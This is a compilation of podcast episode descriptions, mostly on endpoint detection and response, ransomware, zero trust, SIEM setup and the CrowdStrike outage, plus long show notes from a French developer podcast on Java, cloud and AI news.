How much trust should you put in your Endpoint Detection and Response (EDR) solution? Let's find out with your hosts Kip Boyle, CISO with Cyber Risk Opportunities, and Jake Bernstein, Partner with K&L Gates. Want to quickly come up to speed with the Essential Eight (E8)? Listen to this episode: https://cr-map.com/podcast/63/
Endpoint security tools worked, but the hackers worked harder for their payday.
While everyone likes to know how someone else might have screwed up and what the fallout looks like, the more important elements of episodes like this one come from the in-depth conversations about new tactics and strategies that are being used by the bad guys, and simultaneously, the insight on new best practices for the good guys.
So while I did enjoy diving into how the ransomware group Akira was able to use webcam access to infiltrate an organization, it was also great to discuss the evolution of these hacking groups, EDR tools, dark web monitoring and the need for better credential security with Steve Ross. He's the director of cybersecurity at S-RM, a leading provider of cyber intelligence and solutions.
Watch/listen as we also discuss:
Endpoint Detection and Response (EDR) tools.
The rise of Akira, and the evolving symbiotic strategies used by this and other RaaS groups.
Patching challenges.
The growing need for dark web monitoring.
The continued rise in login/credential harvesting.
To catch up on past episodes, you can go to Manufacturing.net, IEN.com or MBTmag.com. You can also check Security Breach out wherever you get your podcasts, including Apple, Amazon and Overcast. If you have a cybersecurity story or topic that you'd like to have us explore on Security Breach, you can reach me at jeff@ien.com. To download our latest report on industrial cybersecurity, The Industrial Sector's New Battlefield, click here.
In this episode of Cyber Security Today, host Jim Love covers several major cybersecurity incidents and vulnerabilities. Key stories include the compromise of Windows Defender and other Endpoint Detection and Response (EDR) systems, a data breach on X (formerly known as Twitter) exposing over 200 million user records, and a security flaw in several UK-based dating apps that led to the exposure of approximately 1.5 million private images. The discussion highlights how attackers are increasingly using legitimate software tools to bypass security measures, the implications of these breaches for users, and offers practical tips for maintaining robust cybersecurity.
00:00 Introduction to Today's Cyber Security News
00:29 Compromised Endpoint Detection and Response Systems
01:06 Bypassing Windows Defender: Methods and Implications
02:52 Ransomware Tactics and Legitimate Tool Exploits
04:20 Time Traveling Attacks and EDR Limitations
06:33 Massive Data Breach on X (Twitter)
08:30 UK Dating Apps Expose Private Images
10:47 Fraud Alerts and Scams
13:25 Conclusion and Final Thoughts
In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.
Google has announced a $32 billion ALL CASH acquisition of the Israeli cybersecurity startup Wiz, making it one of the largest deals in the company's history.
A newly discovered zero-day vulnerability in Windows allows attackers to escalate privileges, potentially granting them full control over affected systems.
Security researchers have identified new intrusion techniques used by the SocGholish malware framework, which is increasingly being leveraged to distribute ransomware.
Security researchers have uncovered a new technique that allows attackers to disable Endpoint Detection and Response (EDR) solutions using Windows Defender Application Control (WDAC).
Security researchers have discovered undocumented commands in a widely used Bluetooth chip, potentially exposing over a billion devices to security risks.
At ThreatLocker Zero Trust World 2025 in Orlando, Art Ocain, VP of Cybersecurity & Incident Response at Airiam, shared valuable insights into applying zero trust principles to incident response. The conversation, hosted by Marco Ciappelli and Sean Martin, highlighted the critical role of zero trust in preparing for and managing security incidents.
The Zero Trust Mindset in Incident Response
Ocain discussed how zero trust methodology—embracing the principles of "assume breach" and "always verify, never trust"—can significantly enhance incident response strategies. Instead of merely securing the perimeter or endpoints, his approach involves identifying and protecting core systems through micro-segmentation and robust identity management. By securing each component individually, organizations can minimize the impact of potential breaches.
For example, Ocain described a scenario where segmenting a SQL server from an application server could prevent data loss during an attack. Even if an application server is compromised, critical data remains secure, allowing quicker recovery and continuity of operations.
Dynamic Containment Strategies
Ocain emphasized the importance of dynamic containment when responding to incidents. Traditional methods, such as using Endpoint Detection and Response (EDR) tools, are effective for forensic analysis but may not stop active threats quickly. Instead, he advocated for an "allow list only" approach that restricts access to systems and data, effectively containing threats while maintaining critical business functions.
In practice, when Ocain is called into a crisis, he often implements a deny-by-default solution to isolate compromised systems. This strategy allows him to perform forensics and bring systems back online selectively, ensuring threat actors cannot access recovered systems.
Balancing Security with Business Needs
A significant challenge in adopting zero trust is gaining executive buy-in.
Ocain noted that executive teams often push back against zero trust measures, either out of a desire for convenience or because of misconceptions about its impact on business culture. His approach involves demonstrating real-world scenarios where zero trust could mitigate damage during breaches. By focusing on critical systems and showing the potential consequences of compromised identities or systems, Ocain effectively bridges the gap between security and business priorities.
A Cultural Shift Toward Security
The discussion also touched on the cultural shift required to fully integrate zero trust into an organization. Zero trust is not just a technological framework but a mindset that influences how every employee views access and security. Through scenario-driven exercises and engaging executive teams early in the process, Ocain helps organizations transition from a "department of no" mentality to a collaborative, security-first culture.
Listen to the full episode to explore more strategies on implementing zero trust in incident response and how to align security initiatives with business goals.
Guest: Art Ocain, VP of Cybersecurity & Incident Response at Airiam | On LinkedIn: https://www.linkedin.com/in/artocain/
Hosts:
Sean Martin, Co-Founder at ITSPmagazine [@ITSPmagazine] and Host of Redefining CyberSecurity Podcast [@RedefiningCyber] | On ITSPmagazine: https://www.itspmagazine.com/sean-martin
Marco Ciappelli, Co-Founder at ITSPmagazine [@ITSPmagazine] and Host of Redefining Society Podcast & Audio Signals Podcast | On ITSPmagazine: https://www.itspmagazine.com/itspmagazine-podcast-radio-hosts/marco-ciappelli
This Episode's Sponsors
ThreatLocker: https://itspm.ag/threatlocker-r974
Resources
Learn more and catch more stories from ZTW 2025 coverage: https://www.itspmagazine.com/zero-trust-world-2025-cybersecurity-and-zero-trust-event-coverage-orlando-florida
Register for Zero Trust World 2025: https://itspm.ag/threat5mu1
Catch all of our event coverage: https://www.itspmagazine.com/technology-and-cybersecurity-conference-coverage
To see and hear more Redefining CyberSecurity content on ITSPmagazine, visit: https://www.itspmagazine.com/redefining-cybersecurity-podcast
To see and hear more Redefining Society stories on ITSPmagazine, visit: https://www.itspmagazine.com/redefining-society-podcast
Cybersecurity Today: EDR Evasion, SSH Backdoor, WhatsApp Zero-Click Hack, and DeepSeek AI
In today's episode of Cybersecurity Today, host Jim Love discusses several pressing cybersecurity issues. The show covers Canada's Digital Governance Council's launch of a cyber ready validation program designed to help small and medium-sized businesses improve their cybersecurity. Jim then delves into a new cyber attack technique that bypasses Endpoint Detection and Response (EDR) systems, an SSH backdoor used by the Chinese cyber espionage group Evasive Panda, and a zero-click hacking technique targeting WhatsApp users. The episode concludes with insights on the Chinese open-source AI DeepSeek and the importance of nuanced discussion in security debates. Stay tuned for expert interviews on AI and cybersecurity in upcoming episodes.
00:00 Introduction to Cyber Ready Validation Program
00:52 Emerging Cyber Threats: EDR Evasion
04:42 New SSH Backdoor by Evasive Panda
06:31 WhatsApp Zero-Click Exploit
08:03 DeepSeek AI and Security Concerns
10:45 Conclusion and Call for Discussion
In this episode of CISO Tradecraft, host G Mark Hardy discusses the history and evolution of endpoint protection with guest Kieran Human from ThreatLocker. Starting from the inception of antivirus software by John McAfee in the late 1980s, the episode delves into the advancements through Endpoint Detection and Response (EDR) and introduces the latest in endpoint security: allowlisting and ring fencing. The conversation highlights the limitations of traditional antivirus and EDR solutions in today's threat landscape, emphasizing the necessity of default-deny approaches to enhance cybersecurity. Kieran explains how ThreatLocker's allowlisting and ring-fencing capabilities can block unauthorized applications and actions, thus significantly reducing the risk of malware and ransomware attacks. Practical insights, war stories, and deployment strategies are shared to help cybersecurity leaders implement these next-generation tools effectively.
Thank you to our sponsor ThreatLocker https://hubs.ly/Q02_HRGK0
Transcripts: https://docs.google.com/document/d/1UMrK44ysBjltNkddCkwx9ly6GJ14tIbC
Chapters
00:00 Introduction to Endpoint Protection
00:41 Upcoming Event: CruiseCon 2025
01:18 History of Endpoint Protection
03:34 Evolution of Antivirus to EDR
05:25 Next-Gen Endpoint Protection: Allowlisting
06:44 Guest Introduction: Kieran Human from ThreatLocker
08:06 Benefits of Allowlisting and Ring Fencing
17:14 Challenges and Best Practices
26:19 Conclusion and Call to Action
In this episode of Breaking Badness, we dive deep into the evolving world of Endpoint Detection and Response (EDR) and its critical role in modern cybersecurity. With threats advancing and the sheer volume of endpoint data skyrocketing, AI and deep learning are becoming game changers in threat detection and prevention. Join us as Carl Froggett, CIO at Deep Instinct, and Melissa Bischoping, Senior Director of Security at Tanium, discuss the past, present, and future of EDR, the impact of AI on cybersecurity, and how SOC teams are evolving to stay ahead of bad actors. Learn about how generative AI is influencing attacks, the challenge of SOC burnout, and the innovations shaping the future of endpoint security.
Endpoints such as laptops, desktops, mobile devices, and servers remain a prime target for attackers. These devices, serving as gateways to critical business data and systems, are constantly under siege from malware, ransomware, phishing attacks, and other sophisticated threats. As a CISO, safeguarding your organization's endpoints is a matter of cybersecurity and a strategic financial imperative. Here, I will discuss endpoint security, exploring how solutions like antivirus, Endpoint Detection and Response (EDR), and device management align with the Cyber Defense Matrix to protect your organization's assets and financial well-being.
In this special Black Hat edition of the Breaking Badness Cybersecurity Podcast, Part 1 of a 5 Part Series, we dive deep into how artificial intelligence is transforming the cybersecurity landscape. Our guests—Mark Wojtasiak (VP of Product at Vectra AI), Carl Froggett (CIO at Deep Instinct), Dan Fernandez (Staff Product Manager at Chainguard), and Marcus Ludwig (CEO of Ticura)—join us to explore the evolution of Endpoint Detection and Response (EDR), the growing threats posed by generative AI, and the complexities of securing AI in supply chains. With AI becoming a tool for both attackers and defenders, this episode uncovers the ongoing "AI arms race" and highlights the urgent need for a more preventative approach to cybersecurity.
JVM Summit, virtual threads, application stacks, licences, determinism and LLMs, quantization, two tools of the episode and much more. Recorded on 13 September 2024.
Episode download: LesCastCodeurs-Episode-315.mp3
News
Languages
Netflix uses Java heavily and ran into a problem with virtual threads in Java 21. Netflix engineers analyse the problem in this article: https://netflixtechblog.com/java-21-virtual-threads-dude-wheres-my-lock-3052540e231d
Virtual threads can improve performance but raise challenges. A locking problem was identified: virtual threads block each other. This leads to degraded performance and instability. Netflix is working on resolving these problems and taking full advantage of virtual threads.
A syntax to indicate that a type is nullable or null-restricted may be coming to Java https://bugs.openjdk.org/browse/JDK-8303099
Foo! would forbid null
Foo? would indicate that null is accepted
Foo?[]! would be a non-null array of nullable values
There are also syntax ideas for initialising null-restricted arrays
JEP: https://openjdk.org/jeps/8303099
The JVM Language Summit 2024 videos are online https://www.youtube.com/watch?v=OOPSU4LnKg0&list=PLX8CzqL3ArzUEYnTa6KYORRbP3nhsK0L1
Project Leyden Update
Project Babylon - Code Reflection
Valhalla - Where Are We?
An Opinionated Overview on Static Analysis for Java
Rethinking Java String Concatenation
Code Reflection in Action - Translating Java to SPIR-V
Java in 2024
Type Specialization of Java Generics - What If Casts Have Teeth? (with our very own Rémi Forax!)
also tip or tail for the whole ecosystem
A few links on Babylon: code reflection to express foreign languages (SQL) in Java: https://openjdk.org/projects/babylon/ and their example emulating LINQ https://openjdk.org/projects/babylon/articles/linq
Libraries
Micronaut releases version 4.6 https://micronaut.io/2024/08/26/micronaut-framework-4-6-0-released/
essentially a big update of tons of modules to the latest versions of their dependencies
MicroProfile 7 makes a few incompatible changes and evolutions https://microprofile.io/2024/08/22/microprofile-7-0-release/#general
removes Metrics and replaces it with Telemetry (metrics, logs and tracing)
Metrics remains a spec, but standalone
MicroProfile 7 depends on the Jakarta Core profile and no longer packages it
MicroProfile OpenAPI 4 and Telemetry 2 bring incompatible changes
Quarkus 3.14 with Let's Encrypt and reflection-free Jackson serializers https://quarkus.io/blog/quarkus-3-14-1-released/
Hibernate ORM 6.6
Reflection-free Jackson serializers
Installing Let's Encrypt certificates simply (notably with the helper command line, which works nicely with ngrok to open a tunnel to your localhost)
Backpedalling on @QuarkusTestResource vs @WithTestResource following reports of OOMEs and slowness from better-isolated tests
Structured logging in Spring Boot 3.4 https://spring.io/blog/2024/08/23/structured-logging-in-spring-boot-3-4
Structured logs (often in JSON) let you easily ship them to backends such as Elastic, AWS CloudWatch, etc. You can tie them to reporting and alerting. Spring Boot 3.4 supports structured logging out of the box. It supports the Elastic Common Schema (ECS) and Logstash formats, but it is also possible to extend it with your own formats. You can also enable structured logging to a file. This can be used, for example, to print human-readable logs to the console and write structured logs to a file for machine ingestion.
Infrastructure
CockroachDB, which had a Business Software License approach (source available, then ALS 3 years later), now moves to a proprietary licence with source available https://www.cockroachlabs.com/blog/enterprise-license-announcement/
The Polyform project offers standardised licences according to free vs paid needs https://polyformproject.org/
Cloud
Azure Functions: how cold start is optimised https://www.infoq.com/articles/azure-functions-cold-starts/?utm_campaign=infoq_content&utm_source=twitter&utm_medium=feed&utm_term=Cloud
functions have a naturally high latency
not all long latencies impact the business
cold starts can be measured with the cloud provider's tools, so make use of them
measure latency percentiles
experience: 381 ms cold and 10 ms afterwards
tracing for end-to-end latency
strategies:
keep-alive pings: wake the function at regular intervals to stay "warm"
in the function code: initialise connections and load assemblies during initialisation
configure batching in host.json, disable file system logging, etc.
deploy functions as zips
reduce the size of the code and files (which are copied onto the cold server)
on .NET, enable ReadyToRun, which helps the JIT compiler
Azure instances with more CPU and memory cost more but lower the cold start
dedicated Azure instances for your functions (not shared with other tenants)
then shows concrete examples
Web
Vue.js 3.5 is out https://blog.vuejs.org/posts/vue-3-5
Vue.js 3.5: key new features
Performance and memory optimisations: significant reduction in memory consumption (-56%). Improved performance for large reactive arrays. Fixes for stale computed values and memory leaks.
New features:
Reactive Props Destructure: simpler declaration of props with default values.
Lazy Hydration: control over the hydration of async components.
useId(): generation of stable unique IDs for SSR applications.
data-allow-mismatch: suppresses hydration mismatch warnings.
Custom element improvements: support for app configuration, APIs to access the host and the shadow root, mounting without Shadow DOM, and nonce for tags.
useTemplateRef(): obtaining template refs via the useTemplateRef() API.
Deferred Teleport: teleporting content to elements rendered after the component mounts.
onWatcherCleanup(): registering cleanup callbacks in watchers.
Data and Artificial Intelligence
We often hear about quantized Large Language Models, i.e. using for example 8-bit integers rather than 32-bit floats to reduce GPU memory requirements while keeping precision close to the original. This article explains the quantization process very visually and intuitively: https://newsletter.maartengrootendorst.com/p/a-visual-guide-to-quantization
Guillaume keeps sharing his adventures with the LangChain4j framework. How to do text classification: https://glaforge.dev/posts/2024/07/11/text-classification-with-gemini-and-langchain4j/ using LangChain4j's TextClassification class, which uses a vector-embeddings-based approach to compare similar texts; using few-shot prompting, in different variants, in this other article: https://glaforge.dev/posts/2024/07/30/sentiment-analysis-with-few-shots-prompting/ ; and also how to do multimodal with LangChain4j (with the Gemini model) to analyse text and images, but also videos, audio content or PDF files: https://glaforge.dev/posts/2024/07/25/analyzing-videos-audios-and-pdfs-with-gemini-in-langchain4j/
To vary the predictability or creativity of LLMs, some hyperparameters can be adjusted, such as temperature, top-k and top-p. But do you really know how these parameters work? Two very clear and intuitive articles explain how they work: https://medium.com/google-cloud/is-a-zero-temperature-deterministic-c4a7faef4d20 https://medium.com/google-cloud/beyond-temperature-tuning-llm-output-with-top-k-and-top-p-24c2de5c3b16
temperature flattens the probability of the next token, but variables remain: floating-point approximations, different stacks making these choices differently, what to do when two tokens have equal probability
but there are other approaches to configuring the LLM's responses: top-k (which avoids infrequent tokens), top-p to keep the n tokens that add up to p% of the probability
temperature first, then top-k, then top-p
explains what to use when
The OSI proposes a definition of open source AI https://www.technologyreview.com/2024/08/22/1097224/we-finally-have-a-definition-for-open-source-ai/
big debates over the past months
usable for any purpose without needing permission
researchers can inspect the components and study how the system works
system modifiable for any purpose, including changing its behaviour, and shareable with others with or without modification, whatever the use
Defines levels of transparency (training data, source code, weights)
A long retrospective on PostgreSQL at insane volumes and the lock problems https://ardentperf.com/2024/03/03/postgres-indexes-partitioning-and-lwlocklockmanager-scalability/
an article to reassure you that you will probably never have the problem
story in post-mortem form
advice to avoid these cliffs
Tooling
A first look at Gradle's future declarative notation https://blog.gradle.org/declarative-gradle-first-eap
an article explaining what this new declarative Gradle syntax looks like (in addition to Groovy and Kotlin)
A few videos show the support in Android Studio for now, as well as in an experimental tool, while waiting for support in all IDEs
The idea is to avoid scripting and really have only a description of your build
This should improve Gradle support in IDEs and allow fast completion, etc.
is it just me, or do we have Maven here?
Firefox support in Puppeteer https://hacks.mozilla.org/2024/08/puppeteer-support-for-firefox/
Puppeteer, the browser automation library, now officially supports Firefox as of version 23. This advance lets developers write automation scripts and run end-to-end tests on Chrome and Firefox interchangeably. Firefox integration in Puppeteer relies on WebDriver BiDi, a cross-browser protocol being standardised at the W3C. WebDriver BiDi eases support for multiple browsers and paves the way for simpler, more efficient automation. Puppeteer's main features, such as log capture, device emulation, network interception and script preloading, are now available for Firefox. Mozilla sees WebDriver BiDi as an important step toward a better cross-browser testing experience. Experimental CDP (Chrome DevTools Protocol) support in Firefox will be removed at the end of 2024 in favour of WebDriver BiDi. Although Firefox is officially supported, some APIs remain unsupported and will be the subject of future work.
Guillaume created an @Retry annotation for JUnit 5, to retry the execution of a "flaky" test https://glaforge.dev/posts/2024/09/01/a-retryable-junit-5-extension/
Guillaume had not found a default extension in JUnit 5 to replace JUnit 4's Retry rules
But on social networks an interesting discussion followed, with links to extensions that implement this approach
Such as JUnit Pioneer, which offers lots of useful extensions https://junit-pioneer.org/docs/retrying-test/
Or the rerunner extension https://github.com/artsok/rerunner-jupiter
Arnaud also suggested configuring Maven Surefire to automatically rerun failed tests https://maven.apache.org/surefire/maven-surefire-plugin/examples/rerun-failing-tests.html
the philosophical question is: are intermittently failing tests tolerable?
Architecture
A former GraphQL fan is done with GraphQL and reflects on alternatives https://bessey.dev/blog/2024/05/24/why-im-over-graphql/
GraphQL problems:
Security: authorisation attacks; difficulty of rate limiting; analysis of malicious queries
Performance: N+1 problem (data fetching and authorisation); memory impact when parsing invalid queries
Increased complexity: coupling between business logic and transport layer; difficulty of maintenance and testing
Solutions considered: adopting REST APIs conforming to OpenAPI 3.0+; better documentation and type safety; tools to generate typed client/server code
Two approaches to implementing OpenAPI: "Implementation first" (generating the specification from the code); "Specification first" (generating the code from the specification)
interesting feedback from someone who does not use GraphQL daily. These were problems that were supposed to be fixed as the ecosystem and tools matured, but it showed its limits for this person.
Grace Hopper's 1980 presentation on the future of computers. https://youtu.be/AW7ZHpKuqZg?si=w_o5_DtqllVTYZwt
it's crazy how modern what she describes is
Problems we still have today
positive leadership
She describes the advantage of systems made of several computers
recently declassified
Leader election with conditional writes on S3/GCS/Azure buckets https://www.morling.dev/blog/leader-election-with-s3-conditional-writes/
Leader election is the process of choosing one node among several to perform a task. Traditionally, leader election is done with a distributed lock service such as ZooKeeper. Amazon S3 recently added support for conditional writes, which allows leader election without a separate service. The leader election algorithm works by having nodes compete to create a lock file in S3. The lock file includes an epoch number, which is incremented each time a new leader is elected. Nodes can determine whether they are the leader by listing the lock files and checking the epoch number. Beware, there can be several elected leaders (clocks that have drifted), so that also has to be handled.
Methodologies
Guillaume Laforge interviewed by Sfeir, where he talks about the importance of curiosity, of sharing, of code quality, sprinkled with a few photos of the Cast Codeurs! https://www.sfeir.dev/success-story/guillaume-laforge-maestro-de-java-et-esthete-du-code-propre/
Security
How CrowdStrike brought Windows and many companies to their knees https://next.ink/144464/crowdstrike-donne-des-details-techniques-sur-son-fiasco/
the incident comes from a configuration update of Falcon, CrowdStrike's EDR https://www.crowdstrike.com/blog/falcon-update-for-windows-hosts-technical-details/
what is an EDR? An Endpoint Detection and Response system aims to monitor your machine (network access, logs, etc.) to detect unusual usage. This spy has to interact with the low layers of the system (network, sockets, system logs) and therefore hooks in at the operating system kernel level. It reports information live to a platform, which can then adapt responses live.
although the incident lasted less than 1h30 on CrowdStrike's side, more than 8 million machines ended up out of service, stuck on the Blue Screen Of Death, according to Microsoft https://blogs.microsoft.com/blog/2024/07/20/helping-our-customers-through-the-crowdstrike-outage/
this is not the first time; it had already happened a few months ago on Linux. Since it was a kernel incompatibility it was less significant, as IT departments handle these problems better under Linux https://stackdiary.com/crowdstrike-took-down-debian-and-rocky-linux-a-few-months-ago-and-no-one-noticed/
CIS benchmarks, a pillar for the security of our cloud environments, and not only! (Katia HIMEUR TALHI) https://blog.cockpitio.com/security/cis-benchmarks/
CIS is a non-profit organisation that develops standards to improve cybersecurity. The CIS benchmarks are a set of recommendations and best practices for securing IT systems. They can be used to harden security, comply with regulations and standardise practices.
Law, society and organisation
Microsoft signs an agreement with OVHcloud so that they drop their antitrust complaint https://www.politico.eu/article/microsoft-signs-antitrust-truce-with-ovhcloud/
the complaint was in Europe
allows customers to more easily deploy Microsoft solutions on the cloud provider of their choice
the complaint had been filed in summer 2021
it made running MS solutions more expensive and uncompetitive vs MS
Elasticsearch and Kibana are open source again, adding the AGPL licence to their other existing licences https://www.elastic.co/fr/blog/elasticsearch-is-open-source-again
the market of three years ago and of today has changed
AWS is a good partner
the confusion between Elasticsearch and AWS's product has been cleared up
so back to open source via AGPL, Affero GPL
Elastic never stopped believing in open source, according to Shay Banon, its founder
The change to AGPL is an additional option, not a replacement for one of the other existing licences
and just after, Elastic announces disappointing results, sending the stock down 25% https://siliconangle.com/2024/08/29/elastic-shares-plunge-25-lower-revenue-projections-amid-slower-customer-commitments/
https://unrollnow.com/status/1832187019235397785 and https://www.elastic.co/pricing/faq/licensing for a summary of Elastic's licences
Tools of the episode
MailMate, a Markdown email client that handles lots of emails https://medium.com/@nicfab/mailmate-a-powerful-client-email-for-macos-markdown-integrated-email-composition-e218fe2accf3
Emmanuel uses it on secondary mailboxes
a bit slow to start (sync), and the rest is fast
virtual mailboxes (per query)
SpamSieve
macOS only, I think
Trippy, a network analyser https://github.com/fujiapple852/trippy
It combines traceroute and ping in one CLI
Conferences
The list of conferences comes from Developers Conferences Agenda/List by Aurélie Vache and contributors:
17 September 2024: We Love Speed - Nantes (France)
17–18 September 2024: Agile en Seine 2024 - Issy-les-Moulineaux (France)
19–20 September 2024: API Platform Conference - Lille (France) & Online
20–21 September 2024: Toulouse Game Dev - Toulouse (France)
25–26 September 2024: PyData Paris - Paris (France)
26 September 2024: Agile Tour Sophia-Antipolis 2024 - Biot (France)
2–4 October 2024: Devoxx Morocco - Marrakech (Morocco)
3 October 2024: VMUG Montpellier - Montpellier (France)
7–11 October 2024: Devoxx Belgium - Antwerp (Belgium)
8 October 2024: Red Hat Summit: Connect 2024 - Paris (France)
10 October 2024: Cloud Nord - Lille (France)
10–11 October 2024: Volcamp - Clermont-Ferrand (France)
10–11 October 2024: Forum PHP - Marne-la-Vallée (France)
11–12 October 2024: SecSea2k24 - La Ciotat (France)
15–16 October 2024: Malt Tech Days 2024 - Paris (France)
16 October 2024: DotPy - Paris (France)
16–17 October 2024: NoCode Summit 2024 - Paris (France)
17–18 October 2024: DevFest Nantes - Nantes (France)
17–18 October 2024: DotAI - Paris (France)
30–31 October 2024: Agile Tour Nantais 2024 - Nantes (France)
30–31 October 2024: Agile Tour Bordeaux 2024 - Bordeaux (France)
31 October 2024–3 November 2024: PyCon.FR - Strasbourg (France)
6 November 2024: Master Dev De France - Paris (France)
7 November 2024: DevFest Toulouse - Toulouse (France)
8 November 2024: BDX I/O - Bordeaux (France)
13–14 November 2024: Agile Tour Rennes 2024 - Rennes (France)
16–17 November 2024: Capitole Du Libre - Toulouse (France)
20–22 November 2024: Agile Grenoble 2024 - Grenoble (France)
21 November 2024: DevFest Strasbourg - Strasbourg (France)
21 November 2024: Codeurs en Seine - Rouen (France)
27–28 November 2024: Cloud Expo Europe - Paris (France)
28 November 2024: Who Run The Tech ? - Rennes (France)
2–3 December 2024: Tech Rocks Summit - Paris (France)
3 December 2024: Generation AI - Paris (France)
3–5 December 2024: APIdays Paris - Paris (France)
4–5 December 2024: DevOpsRex - Paris (France)
4–5 December 2024: Open Source Experience - Paris (France)
5 December 2024: GraphQL Day Europe - Paris (France)
6 December 2024: DevFest Dijon - Dijon (France)
22–25 January 2025: SnowCamp 2025 - Grenoble (France)
30 January 2025: DevOps D-Day #9 - Marseille (France)
6–7 February 2025: Touraine Tech - Tours (France)
3 April 2025: DotJS - Paris (France)
16–18 April 2025: Devoxx France - Paris (France)
Contact us
To react to this episode, come and discuss on the Google group https://groups.google.com/group/lescastcodeurs
Contact us via Twitter https://twitter.com/lescastcodeurs
Do a crowdcast or a crowdquestion
Support Les Cast Codeurs on Patreon https://www.patreon.com/LesCastCodeurs
All episodes and all info at https://lescastcodeurs.com/
Dmitri Alperovitch is the Co-Founder and former CTO of Crowdstrike, one of the most valuable cybersecurity companies founded in the modern era that defined the Endpoint Detection and Response (EDR) category. On today's episode, Jon Sakoda speaks with Dmitri on why email security was one of the best places to learn cybersecurity, the hardest parts of finding product-market fit in a new category, and how all of his learnings inside of larger companies ultimately inspired him to start Crowdstrike: Why E-Mail Security Was the Best Place to Learn About Adversaries [7:15 - 14:32] - Dmitri's early career at CipherTrust put him on the front lines of stopping email spam. This was a rapidly changing field that taught him that adversaries could make changes in hours, not days or weeks. This mindset taught him that there are no silver bullets and that our defenses must always adapt quickly to ever-changing threats. Building a Services and Software Company Together to Own the Category [33:53 - 39:34] - In the early days of Crowdstrike, the team built an elite services team that gave them insight into how nation-state adversaries were breaching customers. This gave them unique lead generation and IP that helped them build their endpoint security solution, which ultimately became the category leader in EDR. How Targeting Existing Budgets Unlocked Revenue Growth [39:35 - 45:15] - Crowdstrike early on complemented existing AV solutions with an advanced EDR and IR offering, primarily targeting companies who understood nation-state attacks. Their revenue growth accelerated when they offered to replace traditional anti-virus and could access existing budgets for endpoint security. This move ultimately gave them a much larger TAM leading up to their IPO.
Ever wondered what it takes to stay one step ahead of cybercriminals? This episode, featuring cybersecurity expert Chris Hale, promises to unravel the complexities of safeguarding digital fortresses while sharing invaluable lessons from the frontlines. Chris's journey from a help desk technician to the founder of his own cybersecurity firm is nothing short of inspiring. His early interest in computers, paired with a dual major in Exercise Sport Science and Computer Information Systems, laid the foundation for a career that would see him tackling email viruses at Sports Authority and defending against sophisticated malware and ransomware attacks. The conversation shifts to the high-stakes world of incident response teams, where Chris recounts a harrowing ransomware incident caused by the absence of two-factor authentication on a global admin account. The relentless effort required to handle such crises, including long hours and meticulous post-mortem analyses, underscores the critical role of managed service providers (MSPs) and managed security service providers (MSSPs) in maintaining robust security practices and compliance. Chris's firsthand experiences highlight the importance of hands-on training and continuous learning, offering listeners a realistic glimpse into the demands and rewards of a career in cybersecurity. We also navigate the evolving threat landscape, discussing the necessity of quarterly audits, penetration testing, and consistent security practices across global enterprises. Chris shares insights into the importance of continuous cybersecurity training for all organizational levels, using tools like Breach Secure Now to keep security awareness sharp. The episode wraps up with a discussion on the recent CrowdStrike update debacle and the challenges of choosing reliable Endpoint Detection and Response (EDR) solutions.
Through Chris's expert lens, listeners gain a comprehensive understanding of the current issues and best practices in cybersecurity, making this episode a must-listen for anyone invested in protecting their digital assets.
Today, we will look into two essential cybersecurity solutions: File Integrity Monitoring, or FIM, and Endpoint Detection and Response, commonly known as EDR. Both of these technologies are crucial for protecting systems, but they work in very different ways. We'll be comparing and contrasting their capabilities, benefits, and use cases. Before we get into the main topic, let's review a top trending piece of security news: SANS Institute released a Critical Infrastructure Strategy Guide. Links: https://www.sans.org: SANS Institute released a Critical Infrastructure Strategy Guide; https://en.wikipedia.org: File Integrity Monitoring; https://www.cisco.com: What is an EDR? Be sure to subscribe if you like the content. Follow me @iayusuf or read my blog at https://yusufonsecurity.com You will find a list of all previous episodes there too.
https://youtu.be/jVSMBcT3GnI This week on the podcast, we cover the National Public Data breach that may have leaked every American's social security number. After that, we discuss research from TALOS on how attackers can abuse Microsoft applications on macOS to gain access to your camera and microphone. We end the episode by discussing recent research on how attackers are attempting to evade Endpoint Detection and Response (EDR) tools.
https://youtu.be/wft_hpC-_Wo This week on the podcast, we cover the National Public Data breach that may have leaked every American's social security number. After that, we discuss research from TALOS on how attackers can abuse Microsoft applications on macOS to gain access to your camera and microphone. We end the episode by discussing recent research on how attackers are attempting to evade Endpoint Detection and Response (EDR) tools.
In the world of business cybersecurity, the powerful technology known as “Security Information and Event Management” is sometimes thwarted by the most unexpected actors—the very people setting it up. Security Information and Event Management—or SIEM—is a term used to describe data-collecting products that businesses rely on to make sense of everything going on inside their network, in the hopes of catching and stopping cyberattacks. SIEM systems can log events and information across an entire organization and its networks. When properly set up, SIEMs can collect activity data from work-issued devices, vital servers, and even the software that an organization rolls out to its workforce. The purpose of all this collection is to catch what might easily be missed. For instance, SIEMs can collect information about repeated login attempts occurring at 2:00 am from a set of login credentials that belong to an employee who doesn't typically start their day until 8:00 am. SIEMs can also collect whether the login credentials of an employee with typically low access privileges are being used to attempt to log into security systems far beyond their job scope. SIEMs must also take in the data from an Endpoint Detection and Response (EDR) tool, and they can hoover up nearly anything that a security team wants—from printer logs, to firewall logs, to individual uses of PowerShell. But just because a SIEM can collect something doesn't necessarily mean that it should. Log activity for an organization of 1,000 employees is tremendous, and the collection of frequent activity could bog down a SIEM with noise, slow down a security team with useless data, and rack up serious expenses for a company. Today, on the Lock and Code podcast with host David Ruiz, we speak with Microsoft cloud solution architect Jess Dodson about how companies and organizations can set up, manage, and maintain their SIEMs, along with what advertising pitfalls to avoid when doing their shopping.
Plus, Dodson warns about one of the simplest mistakes in trying to save budget—setting up arbitrary data caps on collection that could leave an organization blind. “A small SMB organization … were trying to save costs, so they went and looked at what they were collecting and they found their biggest ingestion point,” Dodson said. “And what their biggest ingestion point was was their Windows security events, and then they looked further and looked for the event IDs that were costing them the most, and so they got rid of those.” Dodson continued: “Problem was the ones they got rid of were their Log On/Log Off events, which I think most people would agree is kind of important from a security perspective.” Tune in today to listen to the full conversation. You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use. For all our cybersecurity coverage, visit Malwarebytes Labs at malwarebytes.com/blog. Show notes and credits: Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com). Licensed under Creative Commons: By Attribution 4.0 License http://creativecommons.org/licenses/by/4.0/ Outro Music: “Good...
